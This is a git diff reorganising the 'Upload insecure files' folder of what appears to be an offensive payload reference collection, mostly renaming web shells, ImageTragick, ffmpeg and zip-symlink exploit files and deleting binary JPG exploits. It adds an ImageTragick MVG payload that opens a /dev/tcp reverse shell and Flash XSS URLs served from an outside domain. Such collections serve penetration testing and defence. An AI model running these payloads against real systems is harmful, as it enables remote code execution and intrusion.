diff --git a/Upload insecure files/Eicar/eicar.com.txt b/Upload insecure files/CVE Eicar/eicar.com.txt similarity index 100% rename from Upload insecure files/Eicar/eicar.com.txt rename to Upload insecure files/CVE Eicar/eicar.com.txt diff --git a/Upload insecure files/Ffmpeg HLS/README.md b/Upload insecure files/CVE Ffmpeg HLS/README.md similarity index 100% rename from Upload insecure files/Ffmpeg HLS/README.md rename to Upload insecure files/CVE Ffmpeg HLS/README.md diff --git a/Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py b/Upload insecure files/CVE Ffmpeg HLS/gen_avi_bypass.py similarity index 100% rename from Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py rename to Upload insecure files/CVE Ffmpeg HLS/gen_avi_bypass.py diff --git a/Upload insecure files/Ffmpeg HLS/gen_xbin_avi.py b/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py similarity index 100% rename from Upload insecure files/Ffmpeg HLS/gen_xbin_avi.py rename to Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py diff --git a/Upload insecure files/Ffmpeg HLS/read_passwd.avi b/Upload insecure files/CVE Ffmpeg HLS/read_passwd.avi similarity index 100% rename from Upload insecure files/Ffmpeg HLS/read_passwd.avi rename to Upload insecure files/CVE Ffmpeg HLS/read_passwd.avi diff --git a/Upload insecure files/Ffmpeg HLS/read_passwd_bypass.mp4 b/Upload insecure files/CVE Ffmpeg HLS/read_passwd_bypass.mp4 similarity index 100% rename from Upload insecure files/Ffmpeg HLS/read_passwd_bypass.mp4 rename to Upload insecure files/CVE Ffmpeg HLS/read_passwd_bypass.mp4 diff --git a/Upload insecure files/Ffmpeg HLS/read_shadow.avi b/Upload insecure files/CVE Ffmpeg HLS/read_shadow.avi similarity index 100% rename from Upload insecure files/Ffmpeg HLS/read_shadow.avi rename to Upload insecure files/CVE Ffmpeg HLS/read_shadow.avi 
diff --git a/Upload insecure files/Ffmpeg HLS/read_shadow_bypass.mp4 b/Upload insecure files/CVE Ffmpeg HLS/read_shadow_bypass.mp4 similarity index 100% rename from Upload insecure files/Ffmpeg HLS/read_shadow_bypass.mp4 rename to Upload insecure files/CVE Ffmpeg HLS/read_shadow_bypass.mp4 diff --git a/Upload insecure files/Image Tragik 2/README.md b/Upload insecure files/CVE Image Tragik/README.md similarity index 50% rename from Upload insecure files/Image Tragik 2/README.md rename to Upload insecure files/CVE Image Tragik/README.md index 206fcf9..98e51af 100644 --- a/Upload insecure files/Image Tragik 2/README.md +++ b/Upload insecure files/CVE Image Tragik/README.md @@ -1,6 +1,22 @@ -# Image Tragik 2 +# Image Tragik 1 & 2 -## Exploit + +## Exploit v1 + +Simple reverse shell + +```powershell +push graphic-context +encoding "UTF-8" +viewbox 0 0 1 1 +affine 1 0 0 1 0 0 +push graphic-context +image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' +pop graphic-context +pop graphic-context +``` + +## Exploit v2 Simple `id` payload diff --git a/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg similarity index 100% rename from Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_pangu_wrapper.jpg rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg diff --git a/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg similarity index 100% rename from Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_text_wrapper.jpg rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg 
diff --git a/Upload insecure files/Image Tragik/payload_imageover_reverse_shell_devtcp.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg similarity index 100% rename from Upload insecure files/Image Tragik/payload_imageover_reverse_shell_devtcp.jpg rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg diff --git a/Upload insecure files/Image Tragik/payload_imageover_reverse_shell_netcat_fifo.png b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png similarity index 100% rename from Upload insecure files/Image Tragik/payload_imageover_reverse_shell_netcat_fifo.png rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png diff --git a/Upload insecure files/Image Tragik/payload_imageover_wget.gif b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif similarity index 100% rename from Upload insecure files/Image Tragik/payload_imageover_wget.gif rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif diff --git a/Upload insecure files/Image Tragik/payload_url_bind_shell_nc.mvg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg similarity index 100% rename from Upload insecure files/Image Tragik/payload_url_bind_shell_nc.mvg rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg diff --git a/Upload insecure files/Image Tragik/payload_url_curl.png b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_curl.png similarity index 100% rename from Upload insecure files/Image Tragik/payload_url_curl.png rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_curl.png 
diff --git a/Upload insecure files/Image Tragik/payload_url_portscan.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg similarity index 100% rename from Upload insecure files/Image Tragik/payload_url_portscan.jpg rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg diff --git a/Upload insecure files/Image Tragik/payload_url_remote_connection.mvg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg similarity index 100% rename from Upload insecure files/Image Tragik/payload_url_remote_connection.mvg rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg diff --git a/Upload insecure files/Image Tragik/payload_url_reverse_shell_bash.mvg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg similarity index 100% rename from Upload insecure files/Image Tragik/payload_url_reverse_shell_bash.mvg rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg diff --git a/Upload insecure files/Image Tragik/payload_url_touch.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg similarity index 100% rename from Upload insecure files/Image Tragik/payload_url_touch.jpg rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg diff --git a/Upload insecure files/Image Tragik/payload_xml_reverse_shell_nctraditional.xml b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml similarity index 100% rename from Upload insecure files/Image Tragik/payload_xml_reverse_shell_nctraditional.xml rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml 
diff --git a/Upload insecure files/Image Tragik/payload_xml_reverse_shell_netcat_encoded.xml b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml similarity index 100% rename from Upload insecure files/Image Tragik/payload_xml_reverse_shell_netcat_encoded.xml rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml diff --git a/Upload insecure files/Image Tragik 2/centos_id.jpg b/Upload insecure files/CVE Image Tragik/imagetragik2_centos_id.jpg similarity index 100% rename from Upload insecure files/Image Tragik 2/centos_id.jpg rename to Upload insecure files/CVE Image Tragik/imagetragik2_centos_id.jpg diff --git a/Upload insecure files/Image Tragik 2/ubuntu_id.jpg b/Upload insecure files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg similarity index 100% rename from Upload insecure files/Image Tragik 2/ubuntu_id.jpg rename to Upload insecure files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg diff --git a/Upload insecure files/Image Tragik 2/ubuntu_shell.jpg b/Upload insecure files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg similarity index 100% rename from Upload insecure files/Image Tragik 2/ubuntu_shell.jpg rename to Upload insecure files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg diff --git a/Upload insecure files/ZIP Symbolic Link/etc_passwd.zip b/Upload insecure files/CVE ZIP Symbolic Link/etc_passwd.zip similarity index 100% rename from Upload insecure files/ZIP Symbolic Link/etc_passwd.zip rename to Upload insecure files/CVE ZIP Symbolic Link/etc_passwd.zip diff --git a/Upload insecure files/ZIP Symbolic Link/generate.sh b/Upload insecure files/CVE ZIP Symbolic Link/generate.sh similarity index 100% rename from Upload insecure files/ZIP Symbolic Link/generate.sh rename to Upload insecure files/CVE ZIP Symbolic Link/generate.sh 
diff --git a/Upload insecure files/ZIP Symbolic Link/passwd b/Upload insecure files/CVE ZIP Symbolic Link/passwd similarity index 100% rename from Upload insecure files/ZIP Symbolic Link/passwd rename to Upload insecure files/CVE ZIP Symbolic Link/passwd diff --git a/Upload insecure files/PHP .htaccess/.htaccess b/Upload insecure files/Configuration Apache .htaccess/.htaccess similarity index 100% rename from Upload insecure files/PHP .htaccess/.htaccess rename to Upload insecure files/Configuration Apache .htaccess/.htaccess diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/Configuration Apache .htaccess/README.md similarity index 100% rename from Upload insecure files/PHP .htaccess/README.md rename to Upload insecure files/Configuration Apache .htaccess/README.md diff --git a/Upload insecure files/Busybox httpd.conf/README.md b/Upload insecure files/Configuration Busybox httpd.conf/README.md similarity index 100% rename from Upload insecure files/Busybox httpd.conf/README.md rename to Upload insecure files/Configuration Busybox httpd.conf/README.md diff --git a/Upload insecure files/Busybox httpd.conf/httpd.conf b/Upload insecure files/Configuration Busybox httpd.conf/httpd.conf similarity index 100% rename from Upload insecure files/Busybox httpd.conf/httpd.conf rename to Upload insecure files/Configuration Busybox httpd.conf/httpd.conf diff --git a/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh b/Upload insecure files/Configuration Busybox httpd.conf/shellymcshellface.sh similarity index 100% rename from Upload insecure files/Busybox httpd.conf/shellymcshellface.sh rename to Upload insecure files/Configuration Busybox httpd.conf/shellymcshellface.sh 
diff --git a/Upload insecure files/IIS Web Config/web.config b/Upload insecure files/Configuration IIS web.config/web.config similarity index 100% rename from Upload insecure files/IIS Web Config/web.config rename to Upload insecure files/Configuration IIS web.config/web.config diff --git a/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-admin-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-admin-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-admin-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-conf-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-conf-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-conf-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-config-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-config-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-config-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-config-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-controllers-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-controllers-__init__.py.zip 
diff --git a/Upload insecure files/Python __init__.py/python-generate-init.py b/Upload insecure files/Configuration Python __init__.py/python-generate-init.py similarity index 100% rename from Upload insecure files/Python __init__.py/python-generate-init.py rename to Upload insecure files/Configuration Python __init__.py/python-generate-init.py diff --git a/Upload insecure files/Python __init__.py/python-login-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-login-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-login-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-login-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-models-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-models-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-models-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-models-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-modules-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-modules-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-modules-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-scripts-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-scripts-__init__.py.zip 
diff --git a/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-settings-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-settings-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-settings-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-tests-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-tests-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-tests-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-urls-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-urls-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-urls-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-utils-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-utils-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-utils-__init__.py.zip diff --git a/Upload insecure files/Python __init__.py/python-view-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-view-__init__.py.zip similarity index 100% rename from Upload insecure files/Python __init__.py/python-view-__init__.py.zip rename to Upload insecure files/Configuration Python __init__.py/python-view-__init__.py.zip diff --git a/Upload insecure files/Extension Flash/README.md b/Upload insecure files/Extension Flash/README.md new file mode 100644 index 0000000..bd5e8b5 
--- /dev/null +++ b/Upload insecure files/Extension Flash/README.md @@ -0,0 +1,12 @@ +### XSS via SWF + +As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. +This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. + +```powershell +Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); + +IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} + +IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); +``` \ No newline at end of file diff --git a/Upload insecure files/Insecure Flash/xss.swf b/Upload insecure files/Extension Flash/xss.swf similarity index 100% rename from Upload insecure files/Insecure Flash/xss.swf rename to Upload insecure files/Extension Flash/xss.swf diff --git a/Upload insecure files/Insecure Flash/xssproject.swf b/Upload insecure files/Extension Flash/xssproject.swf similarity index 100% rename from Upload insecure files/Insecure Flash/xssproject.swf rename to Upload insecure files/Extension Flash/xssproject.swf diff --git a/Upload insecure files/PDF JS/poc.js b/Upload insecure files/Extension PDF JS/poc.js similarity index 100% rename from Upload insecure files/PDF JS/poc.js rename to Upload insecure files/Extension PDF JS/poc.js diff --git a/Upload insecure files/PDF JS/poc.py b/Upload insecure files/Extension PDF JS/poc.py similarity index 100% rename from Upload insecure files/PDF JS/poc.py rename to Upload insecure files/Extension PDF JS/poc.py 
diff --git a/Upload insecure files/PDF JS/result.pdf b/Upload insecure files/Extension PDF JS/result.pdf similarity index 100% rename from Upload insecure files/PDF JS/result.pdf rename to Upload insecure files/Extension PDF JS/result.pdf diff --git a/Upload insecure files/PHP Extension/phpinfo.jpg.php b/Upload insecure files/Extension PHP/phpinfo.jpg.php similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.jpg.php rename to Upload insecure files/Extension PHP/phpinfo.jpg.php diff --git a/Upload insecure files/PHP Extension/phpinfo.phar b/Upload insecure files/Extension PHP/phpinfo.phar similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.phar rename to Upload insecure files/Extension PHP/phpinfo.phar diff --git a/Upload insecure files/PHP Extension/phpinfo.php b/Upload insecure files/Extension PHP/phpinfo.php similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.php rename to Upload insecure files/Extension PHP/phpinfo.php diff --git a/Upload insecure files/PHP Extension/phpinfo.php3 b/Upload insecure files/Extension PHP/phpinfo.php3 similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.php3 rename to Upload insecure files/Extension PHP/phpinfo.php3 diff --git a/Upload insecure files/PHP Extension/phpinfo.php4 b/Upload insecure files/Extension PHP/phpinfo.php4 similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.php4 rename to Upload insecure files/Extension PHP/phpinfo.php4 diff --git a/Upload insecure files/PHP Extension/phpinfo.php5 b/Upload insecure files/Extension PHP/phpinfo.php5 similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.php5 rename to Upload insecure files/Extension PHP/phpinfo.php5 
diff --git a/Upload insecure files/PHP Extension/phpinfo.php7 b/Upload insecure files/Extension PHP/phpinfo.php7 similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.php7 rename to Upload insecure files/Extension PHP/phpinfo.php7 diff --git a/Upload insecure files/PHP Extension/phpinfo.phpt b/Upload insecure files/Extension PHP/phpinfo.phpt similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.phpt rename to Upload insecure files/Extension PHP/phpinfo.phpt diff --git a/Upload insecure files/PHP Extension/phpinfo.pht b/Upload insecure files/Extension PHP/phpinfo.pht similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.pht rename to Upload insecure files/Extension PHP/phpinfo.pht diff --git a/Upload insecure files/PHP Extension/phpinfo.phtml b/Upload insecure files/Extension PHP/phpinfo.phtml similarity index 100% rename from Upload insecure files/PHP Extension/phpinfo.phtml rename to Upload insecure files/Extension PHP/phpinfo.phtml diff --git a/Upload insecure files/PHP Extension/shell.jpeg.php b/Upload insecure files/Extension PHP/shell.jpeg.php similarity index 100% rename from Upload insecure files/PHP Extension/shell.jpeg.php rename to Upload insecure files/Extension PHP/shell.jpeg.php diff --git a/Upload insecure files/PHP Extension/shell.jpg.php b/Upload insecure files/Extension PHP/shell.jpg.php similarity index 100% rename from Upload insecure files/PHP Extension/shell.jpg.php rename to Upload insecure files/Extension PHP/shell.jpg.php diff --git a/Upload insecure files/PHP Extension/shell.pgif b/Upload insecure files/Extension PHP/shell.pgif similarity index 100% rename from Upload insecure files/PHP Extension/shell.pgif rename to Upload insecure files/Extension PHP/shell.pgif 
diff --git a/Upload insecure files/PHP Extension/shell.phar b/Upload insecure files/Extension PHP/shell.phar similarity index 100% rename from Upload insecure files/PHP Extension/shell.phar rename to Upload insecure files/Extension PHP/shell.phar diff --git a/Upload insecure files/PHP Extension/shell.php b/Upload insecure files/Extension PHP/shell.php similarity index 100% rename from Upload insecure files/PHP Extension/shell.php rename to Upload insecure files/Extension PHP/shell.php diff --git a/Upload insecure files/PHP Extension/shell.php3 b/Upload insecure files/Extension PHP/shell.php3 similarity index 100% rename from Upload insecure files/PHP Extension/shell.php3 rename to Upload insecure files/Extension PHP/shell.php3 diff --git a/Upload insecure files/PHP Extension/shell.php4 b/Upload insecure files/Extension PHP/shell.php4 similarity index 100% rename from Upload insecure files/PHP Extension/shell.php4 rename to Upload insecure files/Extension PHP/shell.php4 diff --git a/Upload insecure files/PHP Extension/shell.php5 b/Upload insecure files/Extension PHP/shell.php5 similarity index 100% rename from Upload insecure files/PHP Extension/shell.php5 rename to Upload insecure files/Extension PHP/shell.php5 diff --git a/Upload insecure files/PHP Extension/shell.php7 b/Upload insecure files/Extension PHP/shell.php7 similarity index 100% rename from Upload insecure files/PHP Extension/shell.php7 rename to Upload insecure files/Extension PHP/shell.php7 diff --git a/Upload insecure files/PHP Extension/shell.phpt b/Upload insecure files/Extension PHP/shell.phpt similarity index 100% rename from Upload insecure files/PHP Extension/shell.phpt rename to Upload insecure files/Extension PHP/shell.phpt diff --git a/Upload insecure files/PHP Extension/shell.pht b/Upload insecure files/Extension PHP/shell.pht similarity index 100% rename from Upload insecure files/PHP Extension/shell.pht rename to Upload insecure files/Extension PHP/shell.pht 
diff --git a/Upload insecure files/PHP Extension/shell.phtml b/Upload insecure files/Extension PHP/shell.phtml similarity index 100% rename from Upload insecure files/PHP Extension/shell.phtml rename to Upload insecure files/Extension PHP/shell.phtml diff --git a/Upload insecure files/PHP Extension/shell.png.php b/Upload insecure files/Extension PHP/shell.png.php similarity index 100% rename from Upload insecure files/PHP Extension/shell.png.php rename to Upload insecure files/Extension PHP/shell.png.php diff --git a/Upload insecure files/JPG Resize/exploit--1.jpg b/Upload insecure files/JPG Resize/exploit--1.jpg deleted file mode 100755 index 05fc5e1..0000000 Binary files a/Upload insecure files/JPG Resize/exploit--1.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-52.jpg b/Upload insecure files/JPG Resize/exploit-52.jpg deleted file mode 100755 index f149d94..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-52.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-53.jpg b/Upload insecure files/JPG Resize/exploit-53.jpg deleted file mode 100755 index 7103e0e..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-53.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-54.jpg b/Upload insecure files/JPG Resize/exploit-54.jpg deleted file mode 100755 index c454dee..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-54.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-56.jpg b/Upload insecure files/JPG Resize/exploit-56.jpg deleted file mode 100755 index 30479c8..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-56.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-57.jpg b/Upload insecure files/JPG Resize/exploit-57.jpg deleted file mode 100755 index 0633c9b..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-57.jpg and /dev/null differ 
diff --git a/Upload insecure files/JPG Resize/exploit-58.jpg b/Upload insecure files/JPG Resize/exploit-58.jpg deleted file mode 100755 index e9357de..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-58.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-59.jpg b/Upload insecure files/JPG Resize/exploit-59.jpg deleted file mode 100755 index 8ccd2e1..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-59.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-60.jpg b/Upload insecure files/JPG Resize/exploit-60.jpg deleted file mode 100755 index e541cdd..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-60.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-61.jpg b/Upload insecure files/JPG Resize/exploit-61.jpg deleted file mode 100755 index 0c32026..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-61.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-62.jpg b/Upload insecure files/JPG Resize/exploit-62.jpg deleted file mode 100755 index f3144db..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-62.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-63.jpg b/Upload insecure files/JPG Resize/exploit-63.jpg deleted file mode 100755 index 978d5d7..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-63.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-64.jpg b/Upload insecure files/JPG Resize/exploit-64.jpg deleted file mode 100755 index d6bb05c..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-64.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-65.jpg b/Upload insecure files/JPG Resize/exploit-65.jpg deleted file mode 100755 index 406801d..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-65.jpg and /dev/null differ 
diff --git a/Upload insecure files/JPG Resize/exploit-66.jpg b/Upload insecure files/JPG Resize/exploit-66.jpg deleted file mode 100755 index 04a4c53..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-66.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-67.jpg b/Upload insecure files/JPG Resize/exploit-67.jpg deleted file mode 100755 index 61aa5c6..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-67.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-68.jpg b/Upload insecure files/JPG Resize/exploit-68.jpg deleted file mode 100755 index b5525e8..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-68.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-69.jpg b/Upload insecure files/JPG Resize/exploit-69.jpg deleted file mode 100755 index 63b046b..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-69.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-70.jpg b/Upload insecure files/JPG Resize/exploit-70.jpg deleted file mode 100755 index 24a2e01..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-70.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-71.jpg b/Upload insecure files/JPG Resize/exploit-71.jpg deleted file mode 100755 index b81b241..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-71.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-72.jpg b/Upload insecure files/JPG Resize/exploit-72.jpg deleted file mode 100755 index 64dae94..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-72.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-73.jpg b/Upload insecure files/JPG Resize/exploit-73.jpg deleted file mode 100755 index 58f8c2d..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-73.jpg and /dev/null differ 
diff --git a/Upload insecure files/JPG Resize/exploit-74.jpg b/Upload insecure files/JPG Resize/exploit-74.jpg deleted file mode 100755 index 57c10ff..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-74.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-75.jpg b/Upload insecure files/JPG Resize/exploit-75.jpg deleted file mode 100755 index 224738b..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-75.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-76.jpg b/Upload insecure files/JPG Resize/exploit-76.jpg deleted file mode 100755 index 2b2bc38..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-76.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-77.jpg b/Upload insecure files/JPG Resize/exploit-77.jpg deleted file mode 100755 index 3b2b2c5..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-77.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-78.jpg b/Upload insecure files/JPG Resize/exploit-78.jpg deleted file mode 100755 index 0027333..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-78.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-79.jpg b/Upload insecure files/JPG Resize/exploit-79.jpg deleted file mode 100755 index eead64d..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-79.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-80.jpg b/Upload insecure files/JPG Resize/exploit-80.jpg deleted file mode 100755 index 5f1a2f8..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-80.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-81.jpg b/Upload insecure files/JPG Resize/exploit-81.jpg deleted file mode 100755 index 644fb2f..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-81.jpg and /dev/null differ 
diff --git a/Upload insecure files/JPG Resize/exploit-82.jpg b/Upload insecure files/JPG Resize/exploit-82.jpg deleted file mode 100755 index d219eea..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-82.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-83.jpg b/Upload insecure files/JPG Resize/exploit-83.jpg deleted file mode 100755 index 4f99d48..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-83.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-84.jpg b/Upload insecure files/JPG Resize/exploit-84.jpg deleted file mode 100755 index 0913b78..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-84.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-85.jpg b/Upload insecure files/JPG Resize/exploit-85.jpg deleted file mode 100755 index 3ab8a9f..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-85.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-86.jpg b/Upload insecure files/JPG Resize/exploit-86.jpg deleted file mode 100755 index 6b17541..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-86.jpg and /dev/null differ diff --git a/Upload insecure files/JPG Resize/exploit-87.jpg b/Upload insecure files/JPG Resize/exploit-87.jpg deleted file mode 100755 index ab386cb..0000000 Binary files a/Upload insecure files/JPG Resize/exploit-87.jpg and /dev/null differ diff --git a/Upload insecure files/JPG 